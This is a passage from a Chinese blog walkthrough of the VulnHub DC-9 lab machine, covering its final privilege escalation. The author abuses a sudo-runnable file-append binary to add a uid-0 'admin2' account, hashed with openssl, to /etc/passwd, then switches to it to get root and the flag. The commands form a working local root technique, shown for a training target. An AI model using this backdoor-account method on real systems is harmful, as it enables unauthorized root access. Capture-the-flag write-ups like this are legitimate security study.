<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ <span class="built_in">ls</span></span><br><span class="line">build  dist  __pycache__  test.py  test.spec</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>查看脚本内容，发现是从一个文件中读取内容然后写入另外一个文件中</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span> (sys.argv) != <span class="number">3</span> :</span><br><span class="line">    <span class="built_in">print</span> (<span class="string">&quot;Usage: python test.py read append&quot;</span>)</span><br><span class="line">    sys.exit (<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span> :</span><br><span class="line">    f = <span class="built_in">open</span>(sys.argv[<span class="number">1</span>], <span class="string">&quot;r&quot;</span>)</span><br><span class="line">    output = (f.read())</span><br><span class="line"></span><br><span class="line">    f = <span class="built_in">open</span>(sys.argv[<span class="number">2</span>], <span class="string">&quot;a&quot;</span>)</span><br><span class="line">    f.write(output)</span><br><span class="line">    f.close()</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后应该是逆向test发现其内部调用了test.py文件，然后py文件又可以对文件内容进行写入，于是利用test可以以root权限往<code>/etc/passwd</code>中写入信息，我们可以进行用户伪造</p>
<p>先使用openssl伪造用户信息，其中123属于盐值为了让相同的密码产生不同的哈希</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd -1 -salt 123 admin</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后将数据写入txt文件中</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;admin2:$1$123<span class="variable">$Ok9FhQy4YioYZeBPwQgm3</span>/:0:0:root:/root:/bin/bash&quot;</span>  &gt; /tmp/1.txt</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后运行test写入<code>/etc/passwd</code></p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> /opt/devstuff/dist/test/test /tmp/1.txt /etc/passwd</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后<code>su admin2</code>切换用户成功提权</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428153734568.png" class title="image-20260428153734568">

<p>拿到flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428153808365.png" class title="image-20260428153808365">

<p>成功完成整个DC系列</p>
</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 Regulus 于 2026-04-17 17:14:23 发布</div><div class="post-copyright-link"><span>作品地址：<a href="http://example.com/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/">vulnhub_DC通关2</a></span><button class="copy-text" type="button" data-text="http://example.com/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>Mei的小窝</a></div><img class="post-copyright-icon noview" src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"></div></div><aside id="post-sidebar" status="show"><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#vulnhub-DC-6-9-%E9%80%9A%E5%85%B3"><span class="toc-list-text">vulnhub_DC(6-9)通关</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#DC-6"><span class="toc-list-text">DC-6</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#DC-7"><span class="toc-list-text">DC-7</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#DC-8"><span class="toc-list-text">DC-8</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#DC-9"><span class="toc-list-text">DC-9</span></a></li></ol></li></ol></div></div></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="http://example.com/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div class="search-overlay"><div class="search-container"><div class="search-header"><div class="search-title"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg>
搜索</div><div class="search-close-btn"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 21a9 9 0 0 0 9 -9a9 9 0 0 0 -9 -9a9 9 0 0 0 -9 9a9 9 0 0 0 9 9z" /><path d="M9 8l6 8" /><path d="M15 8l-6 8" /></svg></div></div><div class="search-input-box"><input id="search-input" type="search" placeholder="请输入关键词进行站内搜索……" value="" maxlength="80"/></div><div class="search-result-container"><div class="search-result-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg></div></div></div></div></main><footer><div class="footer"><div id="footer-copyright">© 2024 - 2026 <span>💗</span> <a href="/null">Regulus</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.2.0" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2024-04-02T22:16:20.000Z">🌻已稳定运行.年.月.天</span></div></div><div id="footer-statistic"><span>共撰写192篇文章，全站共535.9k字</span></div><div id="footer-pageview"><div id="container_site_pv"><span>🔥总访问量</span><span id="vercount_value_site_pv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div><div id="container_site_uv"><span>🐈访客人数</span><span id="vercount_value_site_uv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/loading.gif',
  friends: false,
  codeblock: true,
  share_text: '',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: true,
    path: 'search.json',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script src="https://events.vercount.one/js" defer="defer"></script><script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/plugins/dist/search.js"></script>

<script src="/js/main.js" type="module"></script>
</div></body></html>